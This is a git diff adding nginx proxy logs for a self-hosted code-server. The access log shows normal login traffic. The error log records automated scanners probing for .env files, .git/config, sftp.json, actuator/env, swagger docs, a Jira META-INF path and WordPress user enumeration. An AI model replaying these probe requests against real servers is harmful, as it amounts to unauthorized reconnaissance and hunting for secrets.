[Gzip -] [Sent-to code-server] "okhttp/5.3.0" "-" +[31/Jan/2026:13:34:57 +0000] - 401 401 - GET https code.profibot.hu "/favicon.ico" [Client 54.174.218.49] [Length 24] [Gzip -] [Sent-to code-server] "okhttp/5.3.0" "-" +[31/Jan/2026:13:34:57 +0000] - 401 401 - GET https code.profibot.hu "/favicon.png" [Client 54.174.218.49] [Length 24] [Gzip -] [Sent-to code-server] "okhttp/5.3.0" "-" +[31/Jan/2026:13:34:57 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 54.174.218.49] [Length 685] [Gzip -] [Sent-to code-server] "okhttp/5.3.0" "-" +[31/Jan/2026:13:34:57 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 54.174.218.49] [Length 4231] [Gzip -] [Sent-to code-server] "okhttp/5.3.0" "-" +[31/Jan/2026:13:34:57 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 54.174.218.49] [Length 3276] [Gzip -] [Sent-to code-server] "okhttp/5.3.0" "-" +[31/Jan/2026:13:34:57 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-512.png" [Client 54.174.218.49] [Length 8489] [Gzip -] [Sent-to code-server] "okhttp/5.3.0" "-" +[31/Jan/2026:13:35:22 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 54.174.218.49] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "-" +[31/Jan/2026:13:35:22 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 54.174.218.49] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "-" +[31/Jan/2026:13:35:22 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 54.174.218.49] [Length 769] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://code.profibot.hu/login" +[31/Jan/2026:13:35:22 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 54.174.218.49] [Length 427] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://code.profibot.hu/login" +[31/Jan/2026:13:35:23 +0000] - 401 401 - GET https code.profibot.hu "/favicon.ico" [Client 54.174.218.49] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://code.profibot.hu/login" +[31/Jan/2026:13:35:23 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 54.174.218.49] [Length 685] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://code.profibot.hu/login" +[31/Jan/2026:13:35:23 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 54.174.218.49] [Length 4213] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://code.profibot.hu/login" +[31/Jan/2026:13:35:23 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 54.174.218.49] [Length 3276] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://code.profibot.hu/login" +[31/Jan/2026:13:35:23 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-512.png" [Client 54.174.218.49] [Length 8489] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/138.0.7204.23 Safari/537.36" "https://code.profibot.hu/login" +[02/Feb/2026:04:12:17 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 45.55.50.217] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Edge/120.0.0.0" "-" +[02/Feb/2026:04:12:17 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 45.55.50.217] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Edge/120.0.0.0" "https://code.profibot.hu" +[02/Feb/2026:06:49:28 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[02/Feb/2026:06:49:28 +0000] - 304 304 - GET https code.profibot.hu "/login" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[02/Feb/2026:06:49:28 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[02/Feb/2026:06:49:28 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[02/Feb/2026:06:49:31 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[02/Feb/2026:07:36:00 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 64.225.4.54] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[02/Feb/2026:12:57:24 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[02/Feb/2026:12:57:24 +0000] - 304 304 - GET https code.profibot.hu "/login" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[02/Feb/2026:12:57:24 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[02/Feb/2026:12:57:24 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[02/Feb/2026:12:57:26 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" diff --git a/proxy-manager/data/logs/proxy-host-8_error.log b/proxy-manager/data/logs/proxy-host-8_error.log new file mode 100755 index 0000000..6967507 --- /dev/null +++ b/proxy-manager/data/logs/proxy-host-8_error.log @@ -0,0 +1,143 @@ +2026/01/19 23:24:07 [error] 249#249: *3215 code-server could not be resolved (2: Server failure), client: 195.123.244.84, server: code.profibot.hu, request: "HEAD / HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:08 [error] 249#249: *3219 code-server could not be resolved (2: Server failure), client: 104.244.74.39, server: code.profibot.hu, request: "HEAD /.env HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:08 [error] 249#249: *3219 code-server could not be resolved (2: Server failure), client: 104.244.74.39, server: code.profibot.hu, request: "HEAD /.env.local HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:08 [error] 249#249: *3219 code-server could not be resolved (2: Server failure), client: 104.244.74.39, server: code.profibot.hu, request: "HEAD /.env.prod HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:08 [error] 249#249: *3219 code-server could not be resolved (2: Server failure), client: 104.244.74.39, server: code.profibot.hu, request: "HEAD /.env.dev HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:12 [error] 250#250: *3220 code-server could not be resolved (2: Server failure), client: 154.28.229.6, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:12 [error] 251#251: *3221 code-server could not be resolved (2: Server failure), client: 107.172.195.162, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:13 [error] 252#252: *3226 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:13 [error] 251#251: *3228 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:15 [error] 249#249: *3232 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:15 [error] 249#249: *3231 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:16 [error] 249#249: *3234 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "POST /graphql HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:16 [error] 249#249: *3233 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "POST /graphql HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:16 [error] 249#249: *3235 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "POST /api HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:17 [error] 249#249: *3236 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "POST /api HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:17 [error] 249#249: *3237 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "POST /api/graphql HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:17 [error] 249#249: *3239 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "POST /graphql/api HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:17 [error] 249#249: *3238 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "POST /api/graphql HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:18 [error] 249#249: *3240 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "POST /api/gql HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:18 [error] 249#249: *3241 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "POST /graphql/api HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:19 [error] 249#249: *3242 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "POST /api/gql HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:19 [error] 249#249: *3243 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /swagger-ui.html HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:20 [error] 249#249: *3246 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /swagger/index.html HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:21 [error] 249#249: *3247 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /swagger-ui.html HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:21 [error] 249#249: *3251 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /swagger/swagger-ui.html HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:22 [error] 249#249: *3253 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /swagger/index.html HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:22 [error] 249#249: *3256 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /webjars/swagger-ui/index.html HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:22 [error] 249#249: *3250 code-server could not be resolved (2: Server failure), client: 104.252.191.21, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:23 [error] 249#249: *3257 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /swagger/swagger-ui.html HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:23 [error] 249#249: *3258 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /swagger.json HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:24 [error] 249#249: *3259 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /webjars/swagger-ui/index.html HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:24 [error] 249#249: *3260 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /swagger/v1/swagger.json HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:25 [error] 250#250: *3261 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /swagger.json HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:25 [error] 249#249: *3262 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /v2/api-docs HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:26 [error] 250#250: *3263 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /swagger/v1/swagger.json HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:26 [error] 249#249: *3264 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /v3/api-docs HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:27 [error] 250#250: *3265 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /v2/api-docs HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:27 [error] 250#250: *3266 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /api-docs/swagger.json HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:28 [error] 250#250: *3267 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /v3/api-docs HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:28 [error] 250#250: *3268 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /api/swagger.json HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:29 [error] 250#250: *3269 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /api-docs/swagger.json HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:29 [error] 250#250: *3270 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /@vite/env HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:30 [error] 250#250: *3271 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /api/swagger.json HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:30 [error] 250#250: *3272 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /actuator/env HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:31 [error] 250#250: *3273 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /@vite/env HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:31 [error] 250#250: *3275 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /server HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:32 [error] 250#250: *3276 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /actuator/env HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:32 [error] 250#250: *3278 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /.vscode/sftp.json HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:33 [error] 250#250: *3279 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /server HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:34 [error] 250#250: *3280 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /.vscode/sftp.json HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:34 [error] 250#250: *3281 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /about HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:35 [error] 250#250: *3282 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /debug/default/view?panel=config HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:36 [error] 250#250: *3283 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /about HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:36 [error] 250#250: *3284 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /v2/_catalog HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:37 [error] 250#250: *3285 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /debug/default/view?panel=config HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:37 [error] 250#250: *3286 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:38 [error] 250#250: *3287 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /v2/_catalog HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:38 [error] 250#250: *3288 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /server-status HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:39 [error] 250#250: *3289 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:39 [error] 250#250: *3290 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /login.action HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:40 [error] 250#250: *3291 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /server-status HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:40 [error] 250#250: *3292 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /_all_dbs HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:41 [error] 251#251: *3293 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /login.action HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:41 [error] 250#250: *3294 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /.DS_Store HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:42 [error] 251#251: *3295 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /_all_dbs HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:42 [error] 250#250: *3296 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /.env HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:43 [error] 251#251: *3297 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /.DS_Store HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:44 [error] 251#251: *3298 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /.env HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:44 [error] 251#251: *3299 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /.git/config HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:45 [error] 251#251: *3300 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /s/830323e23383e22383e21393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:46 [error] 251#251: *3301 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /.git/config HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:46 [error] 251#251: *3302 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /config.json HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:47 [error] 251#251: *3303 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /s/830323e23383e22383e21393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:47 [error] 251#251: *3304 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /telescope/requests HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:48 [error] 251#251: *3305 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /config.json HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:48 [error] 251#251: *3306 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /info.php HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:49 [error] 251#251: *3307 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /telescope/requests HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:49 [error] 251#251: *3308 code-server could not be resolved (2: Server failure), client: 146.190.103.103, server: code.profibot.hu, request: "GET /?rest_route=/wp/v2/users/ HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:50 [error] 251#251: *3309 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /info.php HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:24:51 [error] 251#251: *3310 code-server could not be resolved (2: Server failure), client: 157.245.204.205, server: code.profibot.hu, request: "GET /?rest_route=/wp/v2/users/ HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:25:07 [error] 251#251: *3312 code-server could not be resolved (2: Server failure), client: 104.244.74.39, server: code.profibot.hu, request: "HEAD /.env HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:25:07 [error] 251#251: *3312 code-server could not be resolved (2: Server failure), client: 104.244.74.39, server: code.profibot.hu, request: "HEAD /.env.local HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:25:07 [error] 251#251: *3312 code-server could not be resolved (2: Server failure), client: 104.244.74.39, server: code.profibot.hu, request: "HEAD /.env.prod HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:25:07 [error] 251#251: *3312 code-server could not be resolved (2: Server failure), client: 104.244.74.39, server: code.profibot.hu, request: "HEAD /.env.dev HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:25:16 [error] 251#251: *3313 code-server could not be resolved (2: Server failure), client: 216.194.87.54, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:25:16 [error] 251#251: *3313 code-server could not be resolved (2: Server failure), client: 216.194.87.54, server: code.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "code.profibot.hu", referrer: "https://code.profibot.hu/" +2026/01/19 23:25:16 [error] 251#251: *3314 code-server could not be resolved (2: Server failure), client: 104.253.252.75, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:25:16 [error] 251#251: *3314 code-server could not be resolved (2: Server failure), client: 104.253.252.75, server: code.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "code.profibot.hu", referrer: "https://code.profibot.hu/" +2026/01/19 23:25:27 [error] 251#251: *3316 code-server could not be resolved (2: Server failure), client: 104.244.74.39, server: code.profibot.hu, request: "HEAD /.env HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:25:27 [error] 251#251: *3316 code-server could not be resolved (2: Server failure), client: 104.244.74.39, server: code.profibot.hu, request: "HEAD /.env.local HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:25:27 [error] 251#251: *3316 code-server could not be resolved (2: Server failure), client: 104.244.74.39, server: code.profibot.hu, request: "HEAD /.env.prod HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:25:27 [error] 251#251: *3316 code-server could not be resolved (2: Server failure), client: 104.244.74.39, server: code.profibot.hu, request: "HEAD /.env.dev HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:25:32 [error] 251#251: *3317 code-server could not be resolved (2: Server failure), client: 213.136.82.24, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:25:32 [error] 251#251: *3318 code-server could not be resolved (2: Server failure), client: 213.136.82.24, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:26:14 [error] 252#252: *3320 code-server could not be resolved (2: Server failure), client: 193.19.82.13, server: code.profibot.hu, request: "HEAD / HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:26:26 [error] 252#252: *3321 code-server could not be resolved (2: Server failure), client: 104.244.74.39, server: code.profibot.hu, request: "HEAD /.env HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:26:26 [error] 252#252: *3321 code-server could not be resolved (2: Server failure), client: 104.244.74.39, server: code.profibot.hu, request: "HEAD /.env.local HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:26:26 [error] 252#252: *3321 code-server could not be resolved (2: Server failure), client: 104.244.74.39, server: code.profibot.hu, request: "HEAD /.env.prod HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:26:26 [error] 252#252: *3321 code-server could not be resolved (2: Server failure), client: 104.244.74.39, server: code.profibot.hu, request: "HEAD /.env.dev HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:27:55 [error] 252#252: *3332 code-server could not be resolved (2: Server failure), client: 37.76.11.249, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:27:55 [error] 252#252: *3332 code-server could not be resolved (2: Server failure), client: 37.76.11.249, server: code.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "code.profibot.hu", referrer: "https://code.profibot.hu/" +2026/01/19 23:27:56 [error] 252#252: *3334 code-server could not be resolved (2: Server failure), client: 66.249.81.132, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:27:56 [error] 252#252: *3335 code-server could not be resolved (2: Server failure), client: 66.249.81.134, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:27:57 [error] 252#252: *3336 code-server could not be resolved (2: Server failure), client: 66.102.9.71, server: code.profibot.hu, request: "GET / HTTP/1.1", host: "code.profibot.hu" +2026/01/19 23:30:28 [error] 252#252: *3345 code-server could not be resolved (2: Server failure), client: 194.163.149.48, server: code.profibot.hu, request: "GET /.git/config HTTP/1.1", host: "code.profibot.hu", referrer: "https://mail.google.com/" 